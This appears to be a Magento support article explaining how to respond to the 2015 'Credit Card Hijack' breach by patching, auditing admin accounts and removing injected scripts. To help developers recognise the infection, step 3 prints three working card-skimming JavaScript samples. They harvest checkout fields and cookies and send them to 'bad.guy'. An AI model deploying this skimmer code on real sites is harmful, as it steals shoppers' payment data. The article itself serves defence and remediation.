How to address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.
Problem
First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.
Read How to Improve the Security of Your Magento Store.
Solution
ATTENTION: In addition to the below actions, we strongly recommend you to enlist the services of a Magento developer or security specialist to audit your code.
Take the following actions to safeguard the security of your store and your customers’ data.
1: Apply the latest patch
A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.
- Identify the most current version by visiting the security center page of the Magento website.
- Visit magereport.com to scan your store and identify your store’s version. If it matches the current version, skip to the "2: Review and secure admin users" section. Otherwise, go to the next step.
- Patch your store. See How to patch your Magento store for more information.
2: Review and secure admin users
Use the below procedure to audit and secure your admin users.
- From the Admin Panel, select System > Permissions > Roles.
- Remove all accounts not in use, then set new, strong passwords for your remaining admin accounts. See How to create a secure password for more information.
3: Identify and remove unknown scripts
- From the Admin Panel, select System > Configuration.
- From the Configuration menu, select General > Design.
- From the Design menu, click HTML Head and Footer.
- If the MiscellaneousScripts and Miscellaneous HTML fields are empty, proceed to the next section. Otherwise, continue to Step 5.
- If the Miscellaneous Scripts and Miscellaneous HTML are not empty, ask your developer to search for code similar to the following examples of the Credit Card Hijack exploit’s malicious code:
<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")|| document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html ("https://bad.guy/jquery.php ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"), u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script><script> var snd =null; window.onload = function () { if((new RegExp('onepage')).test(window.location)) { send(); } }; function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox"); for (var i=0;i<inp.length;i++){ if(inp[i].value.length>0) { var nme=inp[i].name; if(nme=='') { nme=i; } snd+=inp[i].name+'='+inp[i].value+'&'; } } } function send() { var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button"); for (var i=0;i<btn.length;i++){ var b=btn[i]; if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') { if(b.addEventListener) { b.addEventListener("click", clk, false); }else { b.attachEvent('onclick', clk); } } } var frm=document.querySelectorAll("form"); for (var i=0;i<frm.length;i++){ if(frm[i].addEventListener) { frm[i].addEventListener("submit", clk, false); }else { frm[i].attachEvent('onsubmit', clk); } } if(snd!=null) { console.clear(); var cc = new RegExp("[0-9]{13,16}"); var asd="0"; if(cc.test(snd)){ asd="1" ; } var http = new XMLHttpRequest(); http.open("POST","https://bad.guy/jquery.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym"); console.clear(); } snd=null; setTimeout('send()', 150); } </script>
<script> function jj(e) { var t = "; " + document.cookie , o = t.split("; " + e + "="); return 2 == o.length ? o.pop().split(";").shift() : void 0 } jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()) , jQuery(function (e) { e("button").on("click", function () { var t = "" , o = "post" , n = window.location; if (new RegExp("onepage|checkout").test(n)) { for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) { var a = c[i].name; "" == a && (a = i) , t += a + "=" + c[i].value + "&" } if (t) { var l = new RegExp("[0-9]{13,16}") , u = new XMLHttpRequest; u.open(o, e("<div />").html("https://bad.guy/jquery.php ").text(), !0) , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded") , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID")) , console.clear() } } }) }); </script>
4: Keep your store secure by following best practices
Attackers are constantly improving their methods. To help secure your store against future exploits and attacks, follow the guidelines provided How to improve the security of your Magento store.